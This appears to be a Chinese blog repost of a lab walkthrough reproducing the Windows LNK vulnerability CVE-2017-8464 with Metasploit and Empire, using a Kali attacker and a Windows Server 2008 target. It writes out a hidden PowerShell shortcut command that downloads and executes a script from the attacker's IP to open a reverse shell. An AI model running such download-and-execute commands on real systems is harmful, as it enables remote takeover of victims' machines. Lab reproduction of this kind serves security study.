[Shell]CVE-2017-8464漏洞复现-程序员宅基地

技术标签: shell  运维  操作系统  

0x01 漏洞原理

Windows系统通过解析 .LNK 后缀文件时,是使用二进制来解析的,而当恶意的二进制代码被系统识别执行的时候就可以实现远程代码执行,由于是在explorer.exe进程中运行的,所以load进内存的时候与当前用户具有相同的权限。

于是攻击者利用这一解析过程的漏洞,将包含恶意二进制的代码被附带进可移动驱动器(或远程共享过程中),受害者使用powershell解析 .LNK 文件后就会被黑客所控制。

成功利用此漏洞的攻击者可能会获得与本地用户相同的用户权限。

0x02 受影响版本

windows 7(32/64位)
windows 8(32/64位)
windows 8.1(32/64位)
windows 10(32/64位,RTM/TH2/RS1/RS2)
windows server 2008(32/64位/IA64)
windows server 2008 R2(64位/IA64)
windows server 2012
windows server 2012 R2
windows server 2016
windows Vista

0x03 漏洞利用1

运用Metasploit对目标主机所存在的漏洞进行利用。选用multi/handler监听模块,利用后可获取shell。

首先我们要准备好CVE-2017-8464的复现环境,kali虚拟机和windows server2008。

攻击机:kali IP:192.168.137.133

靶机:windows server2008 IP:192.168.137.132

3.1 打开kali终端,生成一个powershell文件

1561366-20190901164513978-373973177.png

3.2 然后将生成的文件移动至/var/www/html目录下

1561366-20190901164551169-1783468558.png

3.3 开启apache服务

1561366-20190901164608998-1733479170.png

3.4 在网页尝试访问一下
1561366-20190901164642193-313909930.png

3.5 访问没有问题,我们启动MSF,使用监听模块multi/handler,并配置好对应选项

1561366-20190901164806129-1842873674.png

3.6 然后开始监听
1561366-20190901164817643-569138345.png

3.7 然后我们切换到windows server2008,创建一个快捷方式

我们在这里输入构造好的路径代码:

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.137.133/1.ps1');test.ps1"

1561366-20190901164903375-1676742018.png

3.8 点击下一步,然后点击完成,生成的就是一个powershell快捷方式

1561366-20190901164916310-848200813.png

3.9 我们双击运行一下快捷方式,因为这个快捷方式秒退,无法截图,所以这里

就不贴图了,双击大家都会。然后我们切回kali虚拟机,发现已经反弹到了shell

1561366-20190901164936497-1756543326.png

1561366-20190901164949864-1680418688.png

0x04 漏洞利用2

4.1 使用Empire工具对Win10系统进行攻击,如下图所示:

1561366-20190901165103211-551835234.png

4.2 这里会发现,帝国工具与msf有着差不多的样子。

然后我们使用Windows能够识别的脚本,即生成 .bat文件,然后立刻会存放在/tmp 下:

1561366-20190901165132637-72691679.png

4.3 使用记事本打开bat脚本时,可以看到,恶意二进制代码使用base64加密:

1561366-20190901165209580-1816973982.png

4.4 将这个名为launcher.bat的文件在Windows中运行起来时,回到监听端口就可以看到目标主机已经上线 :

1561366-20190901165237001-1372641431.png

4.5 如此,Windows就获得了当前用户权限:
1561366-20190901165303801-364365482.png

0x05 参考链接

1.CVE-2017-8464漏洞复现

2."震网三代" CVE-2017-8464 关于Powershell 漏洞复现

转载于:https://www.cnblogs.com/-mo-/p/11442815.html

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baguangman5501/article/details/102031519

智能推荐

Faster RCNN原理篇(三)——区域候选网络RPN(Region Proposal Network)的学习、理解-程序员宅基地

文章浏览阅读1w次,点赞57次,收藏170次。区域候选网络RPN(Region Proposal Network)的学习、理解Anchors详解`generate_anchors.py`文件中generate_anchors函数源码解读Anchor的产生过程:RPN(Region Proposal Network):它是首先在Faster RCNN中提出的,其 核心功能: 1. 得到用来预测的feature map。 具体而言:图像在输入网络后,依次经过一系列卷积+ReLU得到了51×39×25651×39×25651×39×256维的featu_region proposal

lucene倒排索引表搜索原理_lucene 倒排表 时间复杂度-程序员宅基地

文章浏览阅读3.9k次,点赞2次,收藏13次。什么是正排索引?什么是倒排索引?搜索的过程是什么样的?会用到哪些算法与数据结构? 前面的内容太宏观,为了照顾大部分没有做过搜索引擎的同学,数据结构与算法部分从正排索引、倒排索引一点点开始。提问:什么是正排索引(forward index)?回答:由key查询实体的过程,是正排索引。用户表:t_user(uid, name, passwd, age, sex),由uid查询整行的过程,就是正排索引查..._lucene 倒排表 时间复杂度

kibana数据源定义_定义攻击数据源第一部分-程序员宅基地

文章浏览阅读789次。kibana数据源定义Discussion around ATT&CK often involves tactics, techniques, procedures, detections, and mitigations, but a significant element is often overlooked: data sources. Data sources for every..._kibana 数据源

R 笔记_r语言adaboost.m1-程序员宅基地

文章浏览阅读2.6k次,点赞3次,收藏15次。包含命令以及简单的文字说明,巩固记忆,并方便以后检索,包含调用方式一些简短说明。经历包括包括《R语言与机器学习》,夹杂一些《R语言实战》以及参考一些网络大神的博客。关于model的summary的说明:星号(***)表示预测能力,显著性水平,星号越多,显著性水平越低,相关的可能越小。多元R方值(判定系数)代表着从整体上,模型能多大程度上解释因变量的值,类似于相关系数。F检验:线性模型输出显示中的F_r语言adaboost.m1

Linux 内核的编译_编译linux内核-程序员宅基地

文章浏览阅读634次。编译Linux内核方面的内容_编译linux内核

Java去除字符串中的空格以及特殊符号_java去前后多空格特殊字符-程序员宅基地

文章浏览阅读3.4k次。前言在抓取一个网站内容的时候遇到了这样的日期没找到现成的代码,就自己写了个方法Java将汉字数字日期转换为数字日期(例如: 二〇二〇年十一月二十一日 → 2020年11月21日)本以为高枕无忧了没成想过了几天又开始作妖了,前面加了一堆空格一样的东西异常拦截到了一打印果真好长一串二〇二〇年一月十三日处理本以为是手到擒来先用了个百度的办法这个博主说这个方法很霸道,秒杀一切stringUtils.d..._java去前后多空格特殊字符

随便推点

sol2 二 教程:快速入门-程序员宅基地

文章浏览阅读3.5k次。断言 / 先决条件你需要在代码中包含#include<sol/sol.hpp> ,这只是一个头文件,不需要编译,但是你的lua 必须是编译可用的。断言如下:#ifndef EXAMPLES_ASSERT_HPP#define EXAMPLES_ASSERT_HPP# define m_assert(condition, message) \ do { \ if (! (condition)) { \ std::ce..._sol2

基于学生网上选课系统的设计与实现-程序员宅基地

文章浏览阅读635次,点赞19次,收藏10次。传统处理数据,必须是一张张纸,然后处理完毕又是统计在一张张纸上面,不断的重复处理,最终有个结果给最高层作为参考,这个模式在互联网没有出现之前,是一种常见的事情,信息管理的效率提不上去,人多不一定力量大,因为人多肯定更加消耗资源,并且因为人类需要休息,需要管理,思想会不统一,会偷懒,所以人们研究出专门帮助人们计算的机器,就是计算机的前身,到了互联网时代,人们发现完全可以让程序供应商提供解决方案,自己挑选自己合适的方案来提高自己的产出比。如果正常操作都会出现问题,那设计就是不稳定的,这一点肯定不行。

OpenAI Sora模型,官方技术文档翻译_openai-sora+技术文档-程序员宅基地

文章浏览阅读1.1k次,点赞21次,收藏21次。本技术报告的重点是(1)将所有类型的视觉数据转化为统一表示,从而能够大规模训练生成模型的方法;以及(2)对Sora的能力和局限性的定性评估。_openai-sora+技术文档

在PyTorch中搭建神经网络的基础知识-程序员宅基地

文章浏览阅读889次,点赞20次,收藏19次。1.背景介绍在PyTorch中搭建神经网络的基础知识1. 背景介绍深度学习是一种通过多层神经网络来处理复杂数据的技术。它已经成为了人工智能领域的核心技术之一,并在图像识别、自然语言处理、语音识别等领域取得了显著的成果。PyTorch是一个流行的深度学习框架,它提供了易于使用的API来构建、训练和部署神经网络。本文将涵盖PyTorch中神经网络的基础知识,包括核心概念、算法原理、最佳实践...

(免费领源码)java#springboot#mysql开放实验室管理系统03361-计算机毕业设计项目选题推荐-程序员宅基地

文章浏览阅读445次,点赞11次,收藏10次。开放实验室管理系统从功能、数据流程、可行性、运行环境进行需求分析。对开放实验室管理系统的数据库、功能进行了详细设计,分析了主要界面设计和相关组件设计,开放实验室管理系统的具体实现进行了介绍。从数据库中获取数据、向数据库中写入数据,实现系统直接对数据库进行各种数据库查询、插入、删除、更新等操作,在网页中加入动态内容,从而实现开放实验室管理系统所需要的各种基本功能。

现代控制理论(4)——李雅普诺夫稳定性理论_李亚普诺夫稳定性-程序员宅基地

文章浏览阅读2.5w次,点赞20次,收藏236次。文章目录_李亚普诺夫稳定性

推荐文章

热门文章

相关标签